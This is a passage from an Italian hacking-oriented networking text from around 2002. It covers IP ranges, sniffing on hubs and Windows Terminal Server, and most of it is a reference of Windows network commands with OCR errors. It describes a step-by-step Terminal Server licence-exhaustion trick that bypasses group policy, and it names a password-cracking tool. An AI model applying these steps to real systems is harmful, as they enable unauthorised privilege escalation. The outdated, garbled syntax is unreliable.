Quando ad una società non di grosse dimensioni sono stati assegnati ad esempio 128 IP 
quasi sicuramente il secondo corrisponde all' IP del suo router. 

Se una società possiede gli IP compresi tra 212.199.165.128 e 255 il router quasi 
sicuramente sarà presente sull'IP 129. 

Non parliamo chiaramente delle grosse società di TELEFONIA alle quali sono assegnati dei 
grossi numeri di IP i quali vengono generalmente suddivisi a diverse altre società. 
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Ad esempio a noi sono stati assegnati 128 IP anche se poi di fatto al nostro interno ne 
usiamo al massimo 30 compresi quelli che il firewall di uscita dall'intranet assegna 
dinamicamente tramite funzioni di mascheramento di IP intranet in IP internet. 
Il discorso degli IP è delicato in quanto la rete ha avuto un incremento tale da portare in breve 
tempo gli IP utilizzabili su Internet. 

Questo problema ha fatto si che ogni società internamente potesse usare delle serie di IP che 
generalmente vengono utilizzati per tali scopi mentre poi questi tramite sistemi software o 
hardware vengono mappati in IP pubblici. 

Questa funzione viene definita di mascheramento e generalmente è il firewall che la esegue. 
In casi come il nostro è un firewall hardware al quale sono stati assegnati dei range di IP da 
utilizzare abbinati ai vari intranet usati dai sistemi interni. 

OS come Linux posseggono questa capacità a livello software come ad esempio i firewall 
creati cn IPCHAINS. 

In ogni caso la creazione delle reti non può essere considearata solo alla luce delle semplici 
schede di rete in quanto gli HUB e gli SWITCH possiedono dei ruoli fondamentali nell'ambito 
della creazione di queste strutture. 

Sia gli hub che gli switch possiedono schede interne che permettono la trasmissione di dati 
tra delle interfaccie fisiche. 

Anche se esteticamente questi due tipi di impianti sono abbastanza simili i loro metodi di 
funzionamento sono differenti. 

L'hub è un dispositivo molto semplice il quale esegue il broadcast delle informazioni ricevute 

da una interfaccia fisica verso tutte le altre connesse allo stesso. 

Di fatto l'hub può essere considerato semplicemente come uno strumento di broadcast. 

Ci si deve sempre ricordare che quando un sistema invia dei dati verso un altro dispositivo 

tutti gli altri connessi all'hub vedono queste informazioni. 

Un hacker potrebbe tranquillamente arrivare a catturare i dati che passano attraverso un 
HUB. 

Il collegamento di uno sniffer ad un hub permette di monitorare tutte le informazioni che 
passano su questo indipendentemente dalla destinazione e dall'orgine di queste. 
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Uno switch invece possiede un intelligenza aggiuntiva rispetto l'hub che gli permette di 
indirizzare verso una determinata destinazione in pacchetti indirizzati a questa. 
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In altre patrole lo SWITCH esegue un analisi degli indirizzi. 
Non stiamo parlando di indirizzi IP ma di indirizzi MAC. 
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Lo switch generalmente possiede anche la possibilità di identificare in automatico i sistemi 
collagti a questo. 

Molti switch professionali possiedono interfaccie utente raggiungibili tramite un apposito IP di 
settaggio il quale permette di visualizzare tutti i parametri di comunicazione di ogni singola 
interfaccia fisica connessa allo switch stesso. 

Gli switch possono anche adattarsi automaticamente a fattori come la velocità della scheda, il 
metodo di trasmissione, full o half duplex, senza considerare che quelli più avanzati 
dispongono della possibilità di creare delle VPN tra diversi segmenti di rete. 
Come potete vedere nella sezione in cui si parla della passwords, spesso gli switch 
possiedono passwords che permettono di accedere ai menu di settaggio. 



Terminal Server di W I N DOW S 

Nei precedenti capitoli abbiamo visto come mediante delle TTY è possbile aprire delle shell 

sotto Unix oppure come con TELNET è possibile collegarsi ad un sistema remoto. 

Windows dispone di un sistema di terminale che permette da postazione remota di accedere 

all'interfaccia grafica di Windows, dopo averci fatto un normalissimo login come da console. 

Il sistema si divide in due parti e precisamente in quella server e in quella client. 

Il server deve essere abilitato mediante le utility presenti nella cartella delle Utilities per 

l'amministratore e il suo servizio deve anch'esso essere abilitato. 

L'attivazione del client invece può avvenire tramite differenti metodi. 

Uno di questi è costituito da un programma che può essere creato appositamente mediante 
un utility su di un floppy. 

Sempree l'attivazione del client può anche avvenire tramite moduli ASP prsenti su WEB 
Server. 

Questo è un ottimo metodo nell'itsnate in cui si deve gestire da remoto un sistema Windows 
senza doversi portare dietro dei programmi particolari. 

La directory che normalmente viene creata con i moduli ASP si chiama TSWeb e contiene 
diversi files ASP che grazie ad un ActiveX particolare permette di eseguire il login su un 
sistema Windows. 

Chiaramente TS introduce una nuova classe di rischi legati alle attività svolte dagli hacker 

non ultimo un exploit uscito proprio oggi (siamo verso la metà di aprile 2002). 

Come tutti i sistemi che possiedono autenticazioni a pasword anche TS possiede le utilties 

indirizzate ad crackare le password d'accesso. 

Una di queste si chiama TSGRINDER. 

Allo stesso modo dei sistemi soggetti a login, a parte il fatto d'entrare, uno dei problemi 
potrebbe essere quello legato alla scalata dei privilegi. 

In altre parole uno esegue l'accesso a livello di GUEST e poi successivamente cerca di 
elevare i suoi privilegi verso quelli di ADMIN. 
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Un grosso BUG di TS 

Windows 2000 grouppolicies (gpo) viene utilizzato da Windows per applicare dei privilegi di 
gruppo ad un certo utente. 

Un grossissimo BUG è dato dal fatto che se si supera il numero di licenze che questo può 
supportare il sistema non applica più nesun diritto. 

Generaemnte il numero di licenze di default è di 5 per cui per eseguire questo exploit 
dobbiamo fare una procedura come quella che segue. 

Attivate una connesione TS client con un server. Questo mostrerà il numero di 'net session a 
uno. 

Attivate un'altra sessione TS client. Il numero di net session sarà a questo punto a due. 
Attivate altre connessioni TS client. A un certo punto sul server ci sarà net session 5. 
Attivate una sesta connessione. A questo punto il numero di licenze sarà superiore a quelle 
disponibili per cui il sistema vi lasvcierà fare il login ma il GPO no verrà applicato. 



I comandi per la gestione e il controllo di rete sotto W indows 

In molti dei capitoli di questo volume viene fatto riferimento a comandi che vengono dati per 
analizzare le configurazioni di rete e per settare le configurazioni. 

Ad esempio parlando di netbios abbiamo visto che con certi comandi potevamo cercare di 
vedere se esistono condivisioni e con altri invece potevamo richiedere l'uso di queste. 
In questo capitolo raggrupperemo tutti i comandi riportando per ciascuno la sintassi. 

Nbtstat 

Questo comando diagnostico visualizza le statistiche sul protocollo e le connessioni TCP/IP 
correnti che utilizzano NBT (NetBIOS su TCP/IP). Questo comando è disponibile solo se è 
stato installato il protocollo TCP/IP. 

nbtstat [-a nomeremoto] [-A indirizzo_IP\ [-c] [-n] [-R] [-r] [-S] [-s] [intervallo] 

Parametri 

-a nomeremoto 

Visualizza la tabella dei nomi del computer remoto utilizzando il nome del computer. 
-A indirizzoJP 

Visualizza la tabella dei nomi del computer remoto utilizzando l'indirizzo IP del computer, 
-c 

Elenca il contenuto della cache dei nomi NetBIOS visualizzando l'indirizzo IP di ciascun 

nome. 

-n 

Visualizza l'elenco dei nomi locali NetBIOS. La voce Registrato indica che il nome è stato 

registrato tramite broadcast (Bnode) o WINS (altri tipi di nodo). 

-R 

Ricarica il file Lmhosts dopo aver eliminato tutti i nomi contenuti nella cache dei nomi 

NetBIOS. 

-r 

Elenca le statistiche per la risoluzione dei nomi di rete di Windows. Su un computer che 
esegue Windows 2000 configurato per l'utilizzo di WINS questa opzione restituisce il numero 
dei nomi risolti e registrati tramite broadcast o WINS. 
-S 

Visualizza entrambe le sessioni client e server, elencando i computer remoti solo in base 

all'indirizzo IP. 

-s 

Visualizza entrambe le sessioni client e server. Effettua un tentativo di conversione 
dell'indirizzo IP del computer remoto in un nome utilizzando il file Hosts. 
intervallo 

Visualizza nuovamente le statistiche selezionate, interrompendosi tra una visualizzazione e 
l'altra per un numero di secondi pari a quanto specificato in intervallo. Premere CTRL+C per 
arrestare la visualizzazione continua delle statistiche. Se questo parametro viene omesso, il 
comando nbstat stamperà le informazioni relative alla configurazione corrente una sola volta. 
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Net (opzioni del comando) 

Molti comandi di rete di Windows 2000 iniziano con la parola net. I comandi net hanno alcune 
caratteristiche comuni: 

• È possibile visualizzare un elenco di tutti i comandi net disponibili digitando net /?. 

• Dal prompt dei comandi è possibile accedere alle informazioni sulla sintassi di un 
comando net digitando net help comando. Per avere ad esempio informazioni sul 
comando net accounts digitare net help accounts. 

• Tutti i comandi net prevedono le opzioni /yes e Ino che è possibile abbreviare con /y 
e In. Le opzioni /y e/nrispondono automaticamente yes e no rispettivamente a ogni 
richiesta interattiva generata dal comando. Mentre ad esempio net stop server 
chiede normalmente all'utente di confermare la decisione di arrestare tutti i servizi 
che dipendono dal server, net stop server /y risponde automaticamente yes alla 
richiesta di conferma di arresto del server. 

Net use 

Connette o disconnette un computer da una risorsa condivisa oppure visualizza le 
informazioni sulle connessioni del computer. Questo comando controlla inoltre le connessioni 
di rete permanenti. 

net use [nomeperiferica \ *] [\\nomecomputei\nomecondivisione[\volumè\] [password | *]] 
[luser:[nomedominio\]nomeutente] [[/delete] | [/persistenti {yes | no}]] 

net use nomeperiferica [lhome[password \ *]] [/delete:{yes | no}] 

net use [/persistent:{yes | no}] 

Parametri 

nessuno 

Utilizzato senza parametri, net use visualizzerà un elenco di connessioni di rete. 
nomeperiferica 

Assegna un nome per connettersi alla risorsa o specifica la periferica da disconnettere. 
Esistono due tipi di nomi di periferica: unità disco, da D: a Z: e stampanti, da LPT1 a LPT3. 
Per assegnare il primo nome di periferica disponibile, digitare un asterisco al posto di un 
nome specifico. 

\\nomecomputei\nomecondivisione 

È il nome del server e della risorsa condivisa. Se nomecomputer contiene degli spazi, è 
necessario racchiuderlo tra virgolette (" ") a partire dalle due barre rovesciate (\\). Il nome 
computer può essere costituito da un numero di caratteri compreso tra 1 e 15. 

Wolume 

Specifica un volume NetWare sul server. Per connettersi ai server NetWare, è necessario che 
sia installato e in esecuzione il Servizio Client per NetWare in Windows 2000 Professional o il 
Servizio gateway in Windows 2000 Server. 

password 
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Specifica la password necessaria per accedere alla risorsa condivisa. 
* 

Visualizza la casella per l'immissione della password. La password non è riprodotta nella 
casella mentre viene digitata. 

/user 

Specifica un nome utente diverso con cui effettuare la connessione. 
nomedominio 

Specifica un altro dominio. Ad esempio, il comando net use d:\\server\condivisione 
/user:admin\rossid connette l'I D utente rossid come se la connessione venisse effettuata dal 
dominio admin. Se non si specifica nomedominio, verrà utilizzato il dominio connesso 
corrente. 

nomeutente 

Specifica il nome utente con cui si effettua l'accesso, 
/delete 

Annulla la connessione di rete specificata. Se si immette un asterisco (*) anziché una 
connessione di rete specifica, verranno annullate tutte le connessioni di rete. 

/home 

Connette un utente alla propria home directory, 
/persisterà 

Controlla l'utilizzo delle connessioni di rete permanenti. L'impostazione predefinita 
corrisponde all'ultima impostazione utilizzata. Le connessioni senza periferica non sono 
permanenti. 

yes 

Salva tutte le connessioni effettuate e le ripristina all'accesso successivo, 
no 

Non salva la connessione in corso o le connessioni successive. Le connessioni esistenti 
verranno ripristinate al successivo accesso alla rete. Per chiudere le connessioni permanenti, 
utilizzare l'opzione /delete. 

Net view 

Visualizza l'elenco dei domini o dei computer oppure le risorse condivise dal computer 
specificato. 

net view [Wnomecomputer \ /doma\n[:nomedominió\] 
net view /network:nw [Wnomedominio] 
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Parametri 

nessuno 

Se non vengono specificati parametri, verrà visualizzato l'elenco dei computer nel dominio 
corrente. 

Wnomecomputer 

Specifica il computer di cui si desidera visualizzare le risorse condivise, 
/domain [ : nomedominio] 

Specifica il dominio per il quale si desidera visualizzare i computer disponibili. Se il parametro 
nomedominio viene omesso, verranno visualizzati tutti i domini della rete. 

/network:nw 

Visualizza tutti i server disponibili su una rete NetWare. Se si specifica un nome di computer, 
verranno visualizzate le risorse di quel computer disponibili sulla rete NetWare. Con questa 
opzione è anche possibile specificare altre reti aggiunte al computer. 

Nslookup 

Questo strumento diagnostico visualizza le informazioni provenienti dai server dei nomi DNS 
(Domain Name System). Prima di utilizzarlo, assicurarsi di conoscere il funzionamento del 
DNS. Nslookup è disponibile solo se è stato installato il protocollo TCP/IP. 

Modalità 

Nslookup può essere eseguito in due modalità: interattiva e non interattiva. 

Se si sta cercando solo un singolo dato, è consigliabile utilizzare la modalità non interattiva. 
Per il primo argomento digitare il nome o l'indirizzo IP del computer di cui si desidera 
effettuare la ricerca. Per il secondo argomento digitare il nome o l'indirizzo IP di un server dei 
nomi DNS. Se il secondo argomento viene omesso, verrà utilizzato il nome del server DNS 
predefinito. 

Utilizzare la modalità interattiva se si desidera cercare più dati. Per il primo argomento 
digitare un trattino (-) e per il secondo digitare il nome o l'indirizzo IP di un server DNS. In 
alternativa, omettendo i due argomenti verrà utilizzato il server predefinito dei nomi DNS. 

nslookup [-opzione ...] [computerdatrovare \ - [serve/]] 

Parametri 

-opzione ... 

Specifica uno o più comandi nslookup come opzione della riga di comando. Per l'elenco dei 
comandi, vedere Sottocomandi nslookup Ciascuna opzione consiste in un trattino (-) seguito 
immediatamente dal nome del comando e in alcuni casi da un segno di uguale (=) e da un 
valore. Per modificare ad esempio il tipo di richiesta predefinito in informazioni host 
(computer) e impostare su 10 secondi il timeout iniziale, è necessario digitare: 

nslookup -querytype=hinfo -timeout=10 
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La lunghezza della riga di comando non deve superare i 256 caratteri. 
computerdatrovare 

Per cercare le informazioni relative al computerdatrovare, utilizzare il server corrente 
predefinito o server, se specificato. Se il computerdatrovare è un indirizzo IP e la richiesta è di 
tipo A o PTR, verrà visualizzato il nome del computer. Se il computerdatrovare è un nome e 
non ha un punto finale, al nome del computer verrà aggiunto quello del dominio DNS 
predefinito. Tale comportamento dipende dalle opzioni del sottocomando set: domains, 
srchlist, defname e search. 

Per cercare un computer che non appartiene al dominio DNS corrente, aggiungere un punto 
al nome. 

Se invece del computerdatrovare si digita un trattino (-), il prompt dei comandi passa alla 
modalità interattiva di nslookup. 

server 

Specifica l'utilizzo del server indicato come server dei nomi DNS. Se server viene omesso, 
verrà utilizzato il server dei nomi DNS predefinito. 

Net share 

Crea, elimina o visualizza le risorse condivise, 
net share nomecondivisione 

net share nomecondivisione=unità:percorso [lusers:numero\ /unlimited] [/remark:"festo"] 
net share nomecondivisione [/users -.numero | unlimited] [/ 'remark:" testo"] 
net share {nomecondivisione \ unità-.percorso} /delete 
Parametri 

nessuno 

Digitare net share senza parametri per visualizzare le informazioni su tutte le risorse 
condivise nel computer locale. 

nomecondivisione 

È il nome di rete della risorsa condivisa. Digitare net share seguito dal parametro 
nomecondivisione per visualizzare solo le informazioni sulla condivisione specificata. 

unità-.percorso 

Specifica il percorso assoluto della directory da condividere. 
/users:numero 

Imposta il numero massimo di utenti che possono accedere contemporaneamente alla risorsa 
condivisa. 
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/unlimited 

Specifica che un numero illimitato di utenti può accedere contemporaneamente alla risorsa 
condivisa. 

/remark:" testo" 

Aggiunge un commento descrittivo della risorsa. Racchiudere il testo tra virgolette, 
/delete 

Termina la condivisione della risorsa. 
Finger 

Visualizza le informazioni relative a un utente su un sistema specificato che esegue il servizio 
Finger. L'output del comando varia a seconda del sistema remoto. Questo comando è 
disponibile solo se è stato installato il protocollo TCP/IP. 

finger [-1] [utente]@computer[...] 

Parametri 

-I 

Visualizza le informazioni in formato lungo. 
utente 

Specifica l'utente su cui si richiedono informazioni. Omettere questo parametro se si desidera 
visualizzare le informazioni su tutti gli utenti del computer specificato: 

©computer 
PathPing 

È uno strumento di rilevamento route che combina le caratteristiche del comando ping e del 
comando tracert con informazioni aggiuntive che nessuno di essi fornisce. Il comando 
pathping invia pacchetti a ciascun router verso la destinazione finale in un certo periodo di 
tempo, calcolando successivamente i risultati in base ai pacchetti restituiti da ciascun hop. 
Poiché il comando pathping mostra il grado di perdita del pacchetto relativo a un dato router o 
un dato collegamento, è possibile determinare quali router o collegamenti potrebbero causare 
problemi di rete. 

pathping [-n] [-h max_hop] [-g elenco-host] [-p periodo] [-q num_query [-w timeout] [-T] [-R] 
nome_destinazione 

Parametri 

-n 

Non vengono risolti gli indirizzi in nomi host. 
-h max_hop 
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Specifica il numero massimo di hop da cercare verso la destinazione. L'impostazione 
predefinita è 30 hop. 

-g elenco-host 

Consente la separazione dei computer consecutivi con gateway intermedi (route di origine 
libera) in elenco-host. 

-p periodo 

Specifica il numero di millisecondi di attesa tra ping consecutivi. L'impostazione predefinita è 
250 millisecondi (1/4 di secondo). 

-q num_query 

Specifica il numero di query a ciascun computer lungo la route. L'impostazione predefinita è 
100. 

-wtimeout 

Specifica il numero di millisecondi di attesa per ciascuna risposta. L'impostazione predefinita 
è 3000 millisecondi (3 secondi). 



Aggiunge un tag con priorità layer-2 (ad esempio 802.1 p) ai pacchetti ping inviati a ogni 
periferica di rete lungo la route. Ciò consente di identificare le periferiche di rete non 
configurate con priorità layer-2. Questo parametro deve essere digitato in maiuscolo. 



Controlla se ogni periferica di rete lungo la route supporta il protocollo RSVP (Resource 
Reservation Setup Protocol) che consente al computer host di riservare una certa quantità di 
larghezza di banda per un flusso di dati. Questo parametro deve essere digitato in maiuscolo. 

nome_destinazione 

Specifica l'endpoint di destinazione identificato dall'indirizzo IP o dal nome dell'host. 
Ping 

Verifica le connessioni con uno o più computer remoti. Questo comando è disponibile solo se 
è stato installato il protocollo TCP/IP. 

ping [-t] [-a] [-n conteggio] [-I lunghezza] [-f] [-i durata] [-v tiposervizió] [-r conteggiò] [s 
conteggiò] [[-j elencocomputer] | [-k elencocomputer]] [-w timeout] elencodestinazioni 

Parametri 

-t 

Effettua il ping sul computer specificato fino a quando non viene interrotto, 
-a 
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Risolve gli indirizzi in nomi di computer, 
-n numero 

Invia il numero di pacchetti ECHO specificati dal parametro conteggio. Il valore predefinito è 
4: 

-I lunghezza 

Invia i pacchetti ECHO contenenti la quantità di dati specificata dal parametro lunghezza. 
L'impostazione predefinita è 32 byte, la quantità massima è 65.527. 

-f 

Invia un flag di Non frammentazione nel pacchetto. Il pacchetto non verrà frammentato dai 
gateway lungo la route. 

-i durata 

Imposta il campo Durata sul valore impostato da questo parametro, 
-v tiposervizio 

Imposta il campo Tipo di servizio sui valori specificati da questo parametro, 
-r conteggio 

Registra la route del pacchetto in uscita e del pacchetto di ritorno nel campo Registra route. 
Tramite questo parametro è possibile specificare da un minimo di 1 a un massimo di 9 
computer. 

-s conteggio 

Indica l'orario per il conteggio degli hop specificati da questo parametro, 
-j elencocomputer 

Inoltra i pacchetti attraverso i computer specificati da questo parametro. È possibile separare i 
computer consecutivi utilizzando gateway intermedi (route di origine libera). Il numero 
massimo consentito da IP è 9. 

-k elencocomputer 

Inoltra i pacchetti attraverso i computer specificati in questo parametro. Non è possibile 
separare i computer consecutivi mediante gateway intermedi (route di origine vincolata). Il 
numero massimo consentito da IP è 9. 

-w timeout 

Specifica un intervallo di timeout in millisecondi. 
elencodestinazioni 

Specifica i computer remoti su cui eseguire il ping. 
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Rcp 

Copia file tra un computer che esegue Windows 2000 e un sistema che utilizza rshd, remote 
shell daemon. Il comando rcp è comando di connettività che può essere utilizzato anche per 
altri tipi di trasferimento per la copia di file tra computer che utilizzano rshd, eseguendo il 
comando da un computer su cui è installato Windows 2000. Il daemon rshd è disponibile sui 
computer UNIX, ma non in Windows 2000. Per questo motivo dai computer che eseguono 
Windows 2000 è possibile utilizzare solo la funzione di sistema da cui viene impartito il 
comando. Il computer remoto deve anch'esso disporre dell'utilità rcp eseguendo rshd. 

rcp [-a | -b] [-h] [-r] originel origine2 ... origineN destinazione 

Parametri 

-a 

Specifica il trasferimento in modalità ASCII. Questa modalità converte i caratteri di ritorno a 
capo/avanzamento riga in ritorni a capo sui file in uscita e i caratteri di avanzamento riga in 
caratteri di ritorno a capo/avanzamento riga per i file in ingresso. Questa è la modalità di 
trasferimento predefinita. 

-b 

Specifica la modalità di trasferimento di immagini binarie. Non viene effettuata alcuna 
conversione dei caratteri di ritorno a capo/avanzamento riga. 

-h 

Trasferisce i file di origine contrassegnati dall'attributo di file nascosto sul computer che 
esegue Windows 2000. Se questa opzione viene omessa, l'indicazione di un file nascosto 
sulla riga di comando di rcp non avrà alcun effetto, in quanto il file non viene riconosciuto. 

-r 

Copia il contenuto di tutte le sottodirectory in modo ricorsivo, dall'origine alla destinazione. È 
necessario che il parametro origine e il parametro destinazione siano entrambi costituiti da 
directory. L'uso di questo parametro viene accettato anche se non si specifica una directory 
come origine, tuttavia in questo caso la ricorsione non sarà effettuata. 

origine e destinazione 

Questi parametri devono essere specificati nella forma [computer[.utente]:]nomefile. Se la 
parte [computer[. utente]:] viene omessa, il computer verrà identificato come computer locale. 
Se si omette la parte [.utente], verrà utilizzato il nome dell'utente attualmente connesso. Se si 
utilizza un nome di computer completo, contenente punti di separazione (.), sarà necessario 
includere [.utente]. In caso contrario, la parte finale del nome computer sarà interpretata 
come nome utente. Se si specificano più file di origine, è necessario che il parametro 
destinazione sia costituito da una directory. 

Se al nome del file non si antepone una barra (/) per i sistemi che eseguono UNIX o una 
barra rovesciata (\) per i sistemi che eseguono Windows 2000, sarà considerato relativo alla 
directory di lavoro corrente. In Windows 2000, sarà la directory da cui viene eseguito il 
comando. Sul sistema remoto sarà la directory di accesso dell'utente remoto. La directory 
corrente è rappresentata da un punto (.). Per utilizzare i caratteri jolly sul computer remoto, 
inserire nei percorsi remoti i caratteri escape \ , ", oppure '. 
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Route 

Consente la gestione delle tabelle di routing della rete. Questo comando è disponibile solo se 
è stato installato il protocollo TCP/IP. 

route [-f] [-p] [comando [destinazione] [mask subnetmask] [gateway] [metric costo]] 

Parametri 

-f 



Cancella tutte le voci relative ai gateway dalle tabelle di routing. Se questo parametro viene 
utilizzato insieme a un comando, le voci delle tabelle verranno eliminate prima 
dell'esecuzione del comando. 



Se utilizzato con il comando add, rende una route permanente anche nel caso di riavvii del 
sistema. In base all'impostazione predefinita, le route non vengono invece mantenute quando 
si riavvia il sistema. Se utilizzato con il comando print, visualizza l'elenco delle route 
permanenti registrate. Viene ignorato se utilizzato insieme a tutti gli altri comandi che 
modificano le route permanenti specificate. 

comando 

Specifica uno dei seguenti comandi. 

Comando Operazione 

print Stampa una route 

add Aggiunge una route 

delete Elimina una route 

change Modifica una route esistente 



destinazione 

Specifica il computer a cui inviare il comando specificato da comando. 
mask subnetmask 

Specifica un valore per la subnet mask da associare alla voce di route. Se non è specificata, 
verrà utilizzato il valore 255.255.255.255. 



gateway 

Specifica un gateway. 

Tutti i nomi simbolici utilizzati per la variabile destinazione o gateway sono riportati nel file di 
database denominato Networks e nel database dei nomi di computer denominato Hosts. Se il 
comando è print o delete, potranno essere utilizzati i caratteri jolly per la destinazione e per il 
gateway oppure sarà possibile omettere il parametro relativo al gateway. 

metric costo 
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Assegna un costo complessivo, compreso tra 1 e 9999, da utilizzare per calcolare le route più 
veloci, più affidabili e/o meno costose. 

Arp 

Visualizza e modifica le tabelle di conversione degli indirizzi fisici IP in indirizzi Ethernet o 
Token Ring utilizzate dal protocollo ARP (Address Resolution Protocol, Protocollo di 
risoluzione dell'indirizzo). Questo comando è disponibile solo se è stato installato il protocollo 
TCP/IP 

arp -a [inet_addr] [-N [if_addr\] 

arp -d inet_addr [if_addr\ 

arp -s inet_addr ether_addr [if_addr\ 

Parametri 

-a 

Visualizza le voci ARP correnti rilevandole dai dati del protocollo TCP/IP. Specificando il 
parametro inet_addr, per il computer indicato verranno visualizzati solo gli indirizzi IP e fisici. 

-g 

Analogo al parametro -a. 
inet_addr 

Specifica un indirizzo IP in notazione decimale puntata. 
-N 

Visualizza le voci ARP per l'interfaccia di rete specificata dal parametro if_addr. 
if_addr 

Specifica, se presente, l'indirizzo IP dell'interfaccia di cui è necessario modificare la tabella di 
conversione degli indirizzi. In caso contrario verrà utilizzata la prima interfaccia adatta allo 
scopo. 

-d 

Elimina la voce specificata dal parametro inet_addr. 
-s 

Aggiunge una voce nella cache ARP per associare l'indirizzo IP specificato dal parametro 
inet_addr all'indirizzo fisico specificato dal parametro ether_addr. L'indirizzo fisico è costituito 
da 6 byte esadecimali separati da trattini. L'indirizzo IP è rappresentato in notazione decimale 
puntata. La voce è permanente, pertanto verrà rimossa automaticamente dalla cache allo 
scadere del timeout. 

ether_addr 
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Specifica un indirizzo fisico. 
Ipconfig 

Questo comando diagnostico visualizza tutti i valori correnti di configurazione della rete 
TCP/IP. Tale comando viene utilizzato soprattutto su sistemi che eseguono il servizio DHCP 
e consente di determinare quali valori del TCP/IP sono stati configurati da DHCP. 

ipconfig [/ali | /renew [scheda] | /release [scheda]] 

Parametri 

ali 

Consente una visualizzazione completa. Se questa opzione non viene specificata, ipconfig 
visualizzerà solo l'indirizzo IP, la subnet mask e i valori del gateway predefinito relativi a 
ciascuna scheda di rete. 

/renew [scheda] 

Rinnova i parametri di configurazione del DHCP. Tale opzione è disponibile solo su sistemi 
che eseguono il servizio client DHCP. Per specificare il nome di una scheda, digitare il nome 
che viene visualizzato quando si utilizza il comando ipconfig senza l'aggiunta di parametri. 

/release [scheda] 

Rilascia la configurazione DHCP corrente. Questa opzione disattiva il protocollo TCP/IP nel 
sistema locale ed è disponibile solo su client DHCP. Per specificare il nome di una scheda, 
digitare il nome che viene visualizzato quando si utilizza il comando ipconfig senza l'aggiunta 
di parametri. 

Se non viene specificato alcun parametro, l'utilità ipconfig presenterà tutti i valori di 
configurazione del TCP/IP, inclusi l'indirizzo IP e la subnet mask. Questa utilità risulta 
particolarmente utile su sistemi che eseguono il DHCP e consente di determinare i valori 
configurati da tale servizio. 

Netstat 

Visualizza le statistiche del protocollo e le correnti connessioni della rete TCP/IP. Questo 
comando è disponibile solo se è stato installato il protocollo TCP/IP. 

netstat [-a] [-e] [-n] [-s] [-p protocollò] [-r] [intervallò] 

Parametri 

-a 

Visualizza tutte le connessioni e le porte di ascolto. Le connessioni del server non sono in 
genere visualizzate. 

-e 

Visualizza le statistiche Ethernet. Questa opzione può essere utilizzata insieme all'opzione -s. 
-n 
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Visualizza in forma numerica indirizzi e numeri di porta, invece di effettuare ricerche per nomi, 
-s 

Visualizza le statistiche ordinate per protocollo. In base all'impostazione predefinita, le 
statistiche vengono ordinate per TCP, UDP, ICMP e IP. Utilizzando l'opzione -p è possibile 
specificare un sottoinsieme dei protocolli predefiniti. 

-p protocollo 

Mostra le connessioni effettuate tramite il protocollo specificato dal parametro protocollo. Il 
valore di protocollo può essere tcp o udp. Se viene utilizzato con l'opzione -s per visualizzare 
le statistiche ordinate per protocollo, protocollo potrà corrispondere a tcp, udp, icmp o ip. 

-r 

Visualizza il contenuto della tabella di routing. 
intervallo 

Visualizza nuovamente le statistiche selezionate, interrompendosi tra una visualizzazione e 
l'altra per un numero di secondi pari al valore di intervallo. Per arrestare il ripetersi della 
visualizzazione, premere CTRL+B. Se il parametro viene omesso, le informazioni relative alla 
configurazione corrente verranno stampate una sola volta. 

Rexec 

Consente l'esecuzione di comandi su computer remoti che eseguono il servizio REXEC. Il 
comando rexec autentica il nome utente sul computer remoto prima di eseguire il comando 
specificato ed è disponibile solo se è stato installato il protocollo TCP/IP. 

rexec computer [-1 nomeutente] [-n] comando 

Parametri 

computer 

Specifica il computer remoto su cui viene eseguito il comando specificato da comando. 
-I nomeutente 

Specifica il nome utente sul computer remoto, 
-n 

Reindirizza l'input del comando rexec su NULL. 
comando 

Specifica il comando da eseguire. 
Tracert 

Questa utilità diagnostica determina la route percorsa verso una destinazione inviando alla 
destinazione stessa pacchetti ECHO Internet Control Message Protocol (ICMP) con valori 
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Time-To-Live (TTL) variabili. È necessario che ogni router lungo il percorso diminuisca il 
valore di TTL di ciascun pacchetto di almeno una unità prima di inoltrarlo. In questo modo il 
valore di TTL fornirà effettivamente il conteggio degli hop. Quando il valore di un pacchetto 
raggiunge lo zero, il router invierà un messaggio ICMP di tempo scaduto al sistema di origine. 
Tracert determina la route inviando il primo pacchetto ECHO contrassegnato da un valore 
TTL pari a 1 , incrementato di 1 a ogni trasmissione successiva, finché la destinazione 
risponde o viene raggiunto il TTL massimo. La route è determinata dall'esame dei messaggi 
ICMP di tempo scaduto restituiti all'origine dai router intermedi. Alcuni router si limitano 
tuttavia a scartare i pacchetti con i valori TTL massimi raggiunti e non vengono rilevati dal 
comando tracert. 

tracert [-d] [-h hopmax] [-j elencocomputei] [-w timeout] nomedestin 

Parametri 

-d 

Specifica di non risolvere gli indirizzi in nomi di computer, 
-h hopmax 

Specifica il numero massimo di hop da cercare per raggiungere la destinazione, 
-j elencocomputer 

Specifica la route di origine libera per il parametro elencocomputer. 
-w timeout 

Attende il numero di millesecondi specificato dal parametro timeout per ciascuna risposta. 
nomedestin 

Nome del computer di destinazione. 
Tftp 

Consente di trasferire file da e verso un computer remoto che esegue il servizio TFTP. 
Questo comando è disponibile solo se è stato installato il protocollo TCP/IP. 

tftp [-i] computer [get | put] origine [destinazione] 

Parametri 



Specifica la modalità di trasferimento di immagini binarie, denominata anche ottetto. In 
modalità immagini binarie il file viene trasferito byte per byte. Utilizzare questa modalità per il 
trasferimento dei file binari. 

Se si omette -i, il file verrà trasferito in modalità ASCII, che corrisponde alla modalità di 
trasferimento predefinita. Questa modalità converte i caratteri EOL in ritorno a capo per UNIX 
e in ritorno a capo/avanzamento riga per i personal computer. Si consiglia di utilizzare questa 
modalità per il trasferimento dei file di testo. Se il trasferimento del file ha esito positivo, verrà 
visualizzata la velocità di trasferimento dei dati. 
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computer 

Specifica il computer locale o remoto, 
put 

Trasferisce la destinazione dei file presente nel computer locale all'origine del file nel 
computer remoto. 

get 

Trasferisce la destinazione del file presente nel computer remoto all'origine del file nel 
computer locale. 

Specificare put se si sta trasferendo il file filedue presente nel computer locale al file fileuno 
nel computer remoto. Specificare get se si sta trasferendo il file filedue presente nel computer 
remoto al file fileuno nel computer remoto. 

Dal momento che il protocollo tftp non supporta l'autenticazione dell'utente, è necessario che 
l'utente abbia effettuato l'accesso e che i file possano essere scritti nel computer remoto. 

origine 

Specifica il file da trasferire. Se il file locale viene specificato come -, il file remoto verrà 
stampato su stdoutse è stato utilizzato il comando get oppure letto da stdin se è stato 
specificato il comando put. 

destinazione 

Specifica la posizione in cui il file verrà trasferito. Se si omette destinazione, il nome sarà 
considerato uguale a quello di origine. 
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Uso di N ETBI OS per l'individuazione delle risorse condivise 

Le attività viste come footprinting erano una tipologia di analisi che poteva essere considerata 

precedente a questa. 

In altre parole nel footprinting le operazioni svolte sono relative alla classificazione di tutte le 
caratteristiche del sistema preso di mira come ad esempio la determinazione del sistema 
